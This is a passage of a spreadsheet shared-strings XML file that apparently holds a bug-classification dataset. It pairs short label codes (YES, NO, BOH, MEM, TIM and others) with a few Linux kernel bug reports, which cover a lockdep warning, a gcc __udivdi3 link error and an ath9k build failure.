    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.37-git16 -- INFO: HARDIRQ-safe -&gt; HARDIRQ-unsafe lock order detected</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Most recent __gcc__ compiler where this bug did *NOT* occur: gcc-4.2.0 Distribution: Hardware Environment: x86 (will try on MAC G4 machine) Software Environment: gcc compilers Problem Description: "make V=1" output kernel/built-in.o: In function `getnstimeofday': (.text+0x1e48d): undefined reference to `__udivdi3' kernel/built-in.o: In function `do_gettimeofday': (.text+0x1e5b5): undefined reference to `__udivdi3' kernel/built-in.o: In function `update_wall_time': (.text+0x1e9e8): undefined reference to `__udivdi3' make: *** [.tmp_vmlinux1] Error 1 Steps to reproduce: use gcc-4.3.0 (experimental) Dose not occur with gcc-4.2.0 or earlier This is just a cautionary advisory for experts from the kernel, gcc (and perhasps binutils) to hash out. I do not belive it is urgent, but it concerns different organizations.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>udivdi3  absence with gcc-4.3.0 on kernels 2.6.20.11 &amp; 2.6.22.-rc1</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LOG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Since 2012-12-04 building the ath9k module from compat-wireless fails when these build options are enabled. export CONFIG_ATH9K_DEBUGFS=y export CONFIG_ATH_DEBUG=y This is the error message from a failed build. CC [M] /media/Linux_Data/Programs_CB10/compat_wireless/compat-wireless-2012-12-15-p/compat-wireless-2012-12-15-p/drivers/net/wireless/ath/ath9k/debug.o /media/Linux_Data/Programs_CB10/compat_wireless/compat-wireless-2012-12-15-p/compat-wireless-2012-12-15-p/drivers/net/wireless/ath/ath9k/debug.c: In function ‘ath9k_sta_add_debugfs’: /media/Linux_Data/Programs_CB10/compat_wireless/compat-wireless-2012-12-15-p/compat-wireless-2012-12-15-p/drivers/net/wireless/ath/ath9k/debug.c:1589:4: error: ‘struct ath_node’ has no member named ‘node_stat’ /media/Linux_Data/Programs_CB10/compat_wireless/compat-wireless-2012-12-15-p/compat-wireless-2012-12-15-p/drivers/net/wireless/ath/ath9k/debug.c: In function ‘ath9k_sta_remove_debugfs’: /media/Linux_Data/Programs_CB10/compat_wireless/compat-wireless-2012-12-15-p/compat-wireless-2012-12-15-p/drivers/net/wireless/ath/ath9k/debug.c:1599:19: error: ‘struct ath_node’ has no member named ‘node_stat’ make[5]: *** [/media/Linux_Data/Programs_CB10/compat_wireless/compat-wireless-2012-12-15-p/compat-wireless-2012-12-15-p/drivers/net/wireless/ath/ath9k/debug.o] Error 1 make[4]: *** [/media/Linux_Data/Programs_CB10/compat_wireless/compat-wireless-2012-12-15-p/compat-wireless-2012-12-15-p/drivers/net/wireless/ath/ath9k] Error 2 make[3]: *** [/media/Linux_Data/Programs_CB10/compat_wireless/compat-wireless-2012-12-15-p/compat-wireless-2012-12-15-p/drivers/net/wireless/ath] Error 2 make[2]: *** [/media/Linux_Data/Programs_CB10/compat_wireless/compat-wireless-2012-12-15-p/compat-wireless-2012-12-15-p/drivers/net/wireless] Error 2 make[1]: *** [_module_/media/Linux_Data/Programs_CB10/compat_wireless/compat-wireless-2012-12-15-p/compat-wireless-2012-12-15-p] Error 2 make[1]: Leaving directory `/usr/src/linux-headers-3.6.0-10.dmz.1-liquorix-amd64' make: *** [modules] Error 2</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LOG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
